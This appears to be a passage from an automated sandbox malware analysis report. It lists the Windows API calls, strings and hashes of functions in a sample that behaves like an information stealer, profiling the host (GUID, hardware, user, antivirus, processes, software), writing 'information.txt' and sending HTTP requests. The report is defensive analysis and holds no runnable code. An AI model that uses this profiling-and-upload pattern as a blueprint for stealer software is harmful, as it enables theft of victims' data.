                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063C6
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004063D7
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063E8
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406401
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 0040640A
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040641D
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406431
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406448
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040649E
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004064A9
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004064B6
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004064C0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                                                            • String ID: "$"$"$*$------$------$------$------$`h$build_id$mode
                                                                                                                                                                                                                                                                            • API String ID: 530647464-2951147139
                                                                                                                                                                                                                                                                            • Opcode ID: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                            • Instruction ID: a08b747351f3a96535aba500675343c14e4fcb34faea4da8f047a2726442ef11
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10522D71801149EACB15E7E5C952BEEBBB89F19304F54407EE60173192DF782B4CCAB9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00415660 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1035stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 912 415660-41649f call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 402420 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4102a0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410c30 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410cd0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410d30 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 GetCurrentProcessId call 4119c0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410ee0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 411020 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4111e0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410260 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410220 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410bb0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410370 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4102a0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410300 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4104d0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410580 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410540 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410680 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4106f0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410aa0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410800 call 40ff50 call 40ff00 call 40fea0 * 2 call 410800 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 4100c0 lstrlen call 4100c0 call 40fe20 call 401120 call 4153e0 call 40fea0 * 5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00427398,00000000,?,00000000,00000000), ref: 004102AE
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: HeapAlloc.KERNEL32(00000000,?,00427398,00000000,?,00000000,00000000), ref: 004102B5
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: GetLocalTime.KERNEL32(00427398,?,00427398,00000000,?,00000000,00000000), ref: 004102C1
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: wsprintfA.USER32 ref: 004102ED
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: RegCloseKey.ADVAPI32(00000000), ref: 00410C9E
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004273D0,00000000,?,00000000,00000000,00000000,00000000), ref: 0041599B
                                                                                                                                                                                                                                                                              • Part of subcall function 004119C0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004119C0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                              • Part of subcall function 004119C0: CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                              • Part of subcall function 00410EE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410EE0: HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00E2E4A0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00E2E4A0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: CreateDCA.GDI32(00E2E5B0,00000000,00000000,00000000), ref: 00410BCA
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410BD5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410BE0
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: ReleaseDC.USER32(00000000,00000000), ref: 00410BEB
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000), ref: 00410BF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000,?), ref: 00410BFF
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: wsprintfA.USER32 ref: 00410C0F
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: RegOpenKeyExA.KERNEL32(80000002,00E306D8,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: RegQueryValueExA.KERNEL32(00000000,00E39238,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: RegCloseKey.ADVAPI32(00000000), ref: 00410530
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105A2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: GetLastError.KERNEL32(?,?,00000001), ref: 004105B0
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105E8
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: wsprintfA.USER32 ref: 00410632
                                                                                                                                                                                                                                                                              • Part of subcall function 00410540: GetSystemInfo.KERNEL32(00000000), ref: 0041054D
                                                                                                                                                                                                                                                                              • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410563
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                              • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410747
                                                                                                                                                                                                                                                                              • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 004107D4
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,00E367A0,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,00E39DF0,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,00E39D30,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,?,0042751C,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416407
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$CloseInformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                            • API String ID: 521975125-4117839003
                                                                                                                                                                                                                                                                            • Opcode ID: b9eb07b7684611d61d0bd3059f479e887a603eaa2ba10f507a7bbd4c1bcea64b
                                                                                                                                                                                                                                                                            • Instruction ID: d0cc808f1cb2f816238a06d44e6270940a99662192b5bc88e36d74afc34faa58
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9eb07b7684611d61d0bd3059f479e887a603eaa2ba10f507a7bbd4c1bcea64b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D923F71805149EACB15E7E1C952AEEBBB85F25304F5040BEA602735D2DF7C2B4CCAB9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040CF10 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 312stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CFC9
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D026
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040D02D
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0040D0DA
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E39750), ref: 0040D0F4
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D107
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A58), ref: 0040D116
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D129
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A5C), ref: 0040D138
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E39780), ref: 0040D149
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D15C
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A60), ref: 0040D16B
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E397F0), ref: 0040D17B
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D18E
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A64), ref: 0040D19D
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E38CB8), ref: 0040D1AE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D1C1
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A68), ref: 0040D1D0
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A6C), ref: 0040D1DF
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(000000FF), ref: 0040D217
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040D269
                                                                                                                                                                                                                                                                              • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                              • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                              • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D299
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
